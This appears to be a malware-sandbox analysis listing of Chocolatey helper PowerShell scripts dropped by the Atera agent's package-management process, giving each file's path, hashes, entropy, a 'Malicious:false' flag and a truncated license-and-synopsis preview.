                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License...#..# Based on http://stackoverflow.com/a/13571471/18475....function Get-WebFileName {..<#...SYNOPSIS..Gets the original file name from a url. Used by Get-WebFile to determine..the original file name for a file......DESCRIPTION..Uses several techniques to determine the original file name of the file..based on the url for the fi

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebHeaders.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5960
                                                                                                                                                                                                                                        Entropy (8bit):5.140316008573171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKovnYWHVjmlvr79s5nFUFwlmiZn28HeheXeGYDXSqVR2vRtktvS:cSyL+QGXH2QVqlvr7y5nFDXnw0ud3Q
                                                                                                                                                                                                                                        MD5:510D813D8B844FA9ABCF1CF8B294CE83
                                                                                                                                                                                                                                        SHA1:B733C7BC5B1EA00C27895DE8BFB337183D9335E1
                                                                                                                                                                                                                                        SHA-256:58C4E3DE6F018A33E4952AF35EFCCC0B688F1170F733CC10E2C32A33F11A9123
                                                                                                                                                                                                                                        SHA-512:3D3DA339A6B9CAC75CB940B573703BBA5782D22918637D4399636F0F2787436920D6965F2165E294C68107905D556F115CD8416C97A18B12B7F0207CD7721AAC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-WebHeaders {..<#...SYNOPSIS..Gets the request/response headers for a url......DESCRIPTION..This is a low-level function that is used by Chocolatey to get the..headers for a reque

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-BinFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6283
                                                                                                                                                                                                                                        Entropy (8bit):5.232086061865062
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHN0Vk7arlCnBVV+7oc9KYjWndTmw:ctL+QG05rlwguh
                                                                                                                                                                                                                                        MD5:5617A2B6826D73A80E864B42A3404E72
                                                                                                                                                                                                                                        SHA1:61522560BF997DD79C6649F0C1D198510E19430F
                                                                                                                                                                                                                                        SHA-256:9FC392C4558C2579517F24D945D8E1741EB4A5D7893E4E2DCA6CA756443AB328
                                                                                                                                                                                                                                        SHA-512:B4EA54386B427AC314854AE3584EBF7AEB9E178026346917B05249A28CF831FBD7F87D12CCF56F00DA9C4F55ABC7324E69C4AB9B367258AC2F35960BAFEFADF3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-BinFile {..<#...SYNOPSIS..Creates a shim (or batch redirect) for a file that is on the PATH......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\b

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4293
                                                                                                                                                                                                                                        Entropy (8bit):5.147557599553147
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKooCb/InyxVkR8PIoIxAETBXSYG:cSyL+QGXHeCjIGVo8qXSYG
                                                                                                                                                                                                                                        MD5:06FC3CDC03EC16E85CE73D558D58742B
                                                                                                                                                                                                                                        SHA1:C73F95322D853B964AD241CD9B1EFD1A6AF8B101
                                                                                                                                                                                                                                        SHA-256:E6E24F83FDA53709F7EA93F73533314156F1DA0B028FC7BD063BA1720D1A6ADA
                                                                                                                                                                                                                                        SHA-512:A1BB72C33CC1544432B6E4A3317843331ECB70D954DBFC195A3A6AD3FDF18280F807BF2A9DEC06D036111A46062EE04A87C2D315F4E895D2C7F2DAAF6B4CB48A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Creates a persistent environment variable......DES

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4549
                                                                                                                                                                                                                                        Entropy (8bit):5.216765809932499
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKobx0W2Pq44GGVq/r6ck8Tr6ck012gMe5RDJRmR0GRSd:cSyL+QGXHBx03x4rVqDQ8vQubL5HItUd
                                                                                                                                                                                                                                        MD5:D283FDF0627E77F4745CE26CBB134DDB
                                                                                                                                                                                                                                        SHA1:D41419D3F8DC3F22B37E5CDE1090CF19879F8466
                                                                                                                                                                                                                                        SHA-256:C4292F8767BD7E74E85C4AABCDB9EB0ED3B564693AAC1F568EB02FF7529DF027
                                                                                                                                                                                                                                        SHA-512:A14822AEC4351C106325F1403F79DF444CB53C03CB09AE0FF15169CEC821102A11186B321F9FE8CEFC35932FE02A874E984EECADDA3EC5DCA52AB7EDEE9DB1F4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyExplorerMenuItem {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates a windows explorer context menu item that can be associated with..a command.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyFileAssociation.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3080
                                                                                                                                                                                                                                        Entropy (8bit):5.192518177403395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoognbqHdyVO6ckUf1eg9DgH:cSyL+QGXHqgnydyVOQUf1eg9DgH
                                                                                                                                                                                                                                        MD5:44D634D52E391B61FEA2B3311FD130C4
                                                                                                                                                                                                                                        SHA1:AC5184FA6552AD3D2D58EBD53563ED3238E089FF
                                                                                                                                                                                                                                        SHA-256:22FA3870EC2455426BD2BA94B5DC82C241D16F1DBD1AC6979787E947B39563AE
                                                                                                                                                                                                                                        SHA-512:53F5C0D5865DA75816B663CDD4279938401498416A2AD4FD4A7667CC93042D4FBCBC7B2F2F1FD3864CFADBC73908730C6EC7761A77207511861CB277AF8DBF59
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyFileAssociation {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates an association between a file extension and a executable......DESCRIPTION..In

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyInstallPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14313
                                                                                                                                                                                                                                        Entropy (8bit):5.166123502608628
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctL+QGm9UIirNuMyrnyBOXOrH2ZoBZiLtM+h1yBPSa:ctL+yG9PKQaOyaBEl1+PSa
                                                                                                                                                                                                                                        MD5:7BB19403672F88442C8510579DEEA62B
                                                                                                                                                                                                                                        SHA1:D7685A3C16C53822D696EE3479451BCF1C42860A
                                                                                                                                                                                                                                        SHA-256:FDAE94594F6DDF60874760BC0E8306422681CE7C177BFA811A625AE74363CCAF
                                                                                                                                                                                                                                        SHA-512:8383D42946F02B72676BF3F6016C0CFA9355AE840320354111B8E40CD9567F46B558B4B60809BF6F0B1364A1F84E6815DC04B02D2F42078E0057F1990CCC83A3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyInstallPackage {.. <#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features". Use..Install-ChocolateyPackage when

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17164
                                                                                                                                                                                                                                        Entropy (8bit):5.102467977763193
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctL+QG/i9AUaHrN+eNbVPoC8XdI96LMw9lpWo:ctL+jiKUW+eNbVPHMG9Gz
                                                                                                                                                                                                                                        MD5:EF3DA9AA21D97701F975F6E7EC05790D
                                                                                                                                                                                                                                        SHA1:C78F165791049FA3A17218AE2ADEECF79C628E15
                                                                                                                                                                                                                                        SHA-256:917FCEC8CA28B0EF404F565AAECF7FB850E193326D012583927CAA8BB55FB3EC
                                                                                                                                                                                                                                        SHA-512:40C18493196A1395EB72629042E0BE98F19CF657E402FF0F21447A238879157534BBCA632C40B047B42C4EA46C9935D40EF53604DCADB5552B8F6D4A5027C809
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPackage {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features" based on a remote file..download. Use Install-

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPath.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4341
                                                                                                                                                                                                                                        Entropy (8bit):5.172978110813656
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMb4lFkF9lr4cr8QCz7rVgAY+AExSNzwdOq7FuRFu7lVENiz:cSyL+4pGXHFKoETMcePrVnxAExSsl73
                                                                                                                                                                                                                                        MD5:B8FD2F73466C4538F16B753C1707E185
                                                                                                                                                                                                                                        SHA1:DEEAFE9F90676AC71FDC879D856A5FF312AF0D74
                                                                                                                                                                                                                                        SHA-256:1134D81094235B52249BD974129142BCE3B9796387C0D7CE71CE68A909A5C6B6
                                                                                                                                                                                                                                        SHA-512:BE6FCFB5FCBA314D4CE62FB47B3A292AADD6C7FB6723D042FC603211B7DFC20D8E2213132BA0ECF29A00050A0C7640E00FF6638EA499A2C0A33D8FBCFBC004E5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPath {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-PathType 'Machine'.`....This puts a directory to the PATH environment variable......DESCRIPTI

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2645
                                                                                                                                                                                                                                        Entropy (8bit):5.278706654776255
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMD+4RXPXbVSPDqA9FM4jImbO2Poq+:cSyL+4pGXHFKoi7bVSe+M4jImg
                                                                                                                                                                                                                                        MD5:9432BDECB1FAE8A80B302A6216A7615B
                                                                                                                                                                                                                                        SHA1:80C6C8255413A9B9E2BD8DE14B274DFEF1F6E86A
                                                                                                                                                                                                                                        SHA-256:20510B09D631C0E5D9E6E4E5F0FC47EF47C1A413FE3F83A2413A2F4E42E1B649
                                                                                                                                                                                                                                        SHA-512:F6BF39157FB67D7434CCC6F80CF7E13C04302243BE3589D8FF85ECDEA1A19559091BA86FD7BB22671B239F16136ABC8FA84A156477497B32B35E9721EF9B7103
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPinnedTaskBarItem {..<#...SYNOPSIS..Creates an item in the task bar linking to the provided path......NOTES..Does not work with SYSTEM, but does not error. It warns

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPowershellCommand.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9319
                                                                                                                                                                                                                                        Entropy (8bit):5.106965440646972
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHni8ybOOeHYlqWKWXVWpRXrHoyf4yc0q1:ctL+QG3ij9e4lqZfc1
                                                                                                                                                                                                                                        MD5:D95A27860316FF9415C6E59530A4F83E
                                                                                                                                                                                                                                        SHA1:16CA9BB81AC55A4EE814915F919FCE89634D637D
                                                                                                                                                                                                                                        SHA-256:F6A1CEB186C30AAD003EAE9B71FDEF4D1DC0D989C81FFDD844C5E9B82EF9532D
                                                                                                                                                                                                                                        SHA-512:4FBE61563130EF06FC69C5FEEFAD59A6FB4DF01BCA7C289A9E8E7B3D16B06BE8BB652AAC7DBF5548BCDDB7F9EEFC2E739B707694BF18995C645F4715DD43C1D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPowershellCommand {..<#...SYNOPSIS..Installs a PowerShell Script as a command.....DESCRIPTION..This will install a PowerShell script as a command on your system. Li

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyShortcut.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7888
                                                                                                                                                                                                                                        Entropy (8bit):5.219559860002251
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXH9mufXMVW7Vb944B6/yS/LIiP8/HahiJqhx8l91b:ctL+QGtmufXBVbwBPi6cJ4x8l91b
                                                                                                                                                                                                                                        MD5:B67CDEF057B2B5376CFDBE1F51AC241E
                                                                                                                                                                                                                                        SHA1:12B3484E2F85D5C591F1DDD178BA71F224BC232B
                                                                                                                                                                                                                                        SHA-256:D09B2B6B3D43259E79E6778581BA884B526D7A0687C90B19F38EF5B0CA1E5752
                                                                                                                                                                                                                                        SHA-512:BDBEC684B46B3039C7C369901C618E4D0313588B4AB3AE3A10C20CA89C9F2CFB24430FF360FA63D813B920088C7CE5DE17C20C193E0F5FBE40495A86212760FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyShortcut {..<#...SYNOPSIS..Creates a shortcut.....DESCRIPTION..This adds a shortcut, at the specified location, with the option to specify..a number of additional p

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyVsixPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8855
                                                                                                                                                                                                                                        Entropy (8bit):5.1654657712280985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHrDorybOY2W/thNuVwBE6nBEvEGYfpxIDcO:ctL+QGNk67zyYpG7
                                                                                                                                                                                                                                        MD5:B751C9113B9601DC1B66D597F86474E9
                                                                                                                                                                                                                                        SHA1:E69E72AEAC3BBF5E3DE0C307FE62C0D293FCE36E
                                                                                                                                                                                                                                        SHA-256:E821C31B1A2C9CF7BB6AF12BBB70D88DC30ABADCBD68197982A0DCC6EEF7C982
                                                                                                                                                                                                                                        SHA-512:BCA21C385EA43B62CF113D35E3A50A66E69C6CB98BDE874DC38D6B517206456C4B3726825EA962E0F1676FD8ED936C51DD8FE7D85E9C1F3A336FDC961A53A662
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyVsixPackage {..<#...SYNOPSIS..Downloads and installs a VSIX package for Visual Studio.....DESCRIPTION..VSIX packages are Extensions for the Visual Studio IDE. The V

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyZipPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9740
                                                                                                                                                                                                                                        Entropy (8bit):5.124129906660506
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXH5l6ybO41LHHPWUWYhNfhNuVtsYzrPr:ctL+QGJlhXlHvbVPLYzLr
                                                                                                                                                                                                                                        MD5:A9F2320F7C75DB38BA32DE454DB14F41
                                                                                                                                                                                                                                        SHA1:52869D1B9C412DC5AB848E1E363A2F1C043A6EBA
                                                                                                                                                                                                                                        SHA-256:D5C38F705555D2F334308EB27E8CFADA3E1503390A19D99C26810295047815E7
                                                                                                                                                                                                                                        SHA-512:D40A8228A93F7543D1F447BC2989A5A9714F07F6CDE411801659483A0BCE5BD5696B5631DEC89FE6D4C9DDD87F29002A421627C9CF60EC57A6A93E02F028BE85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
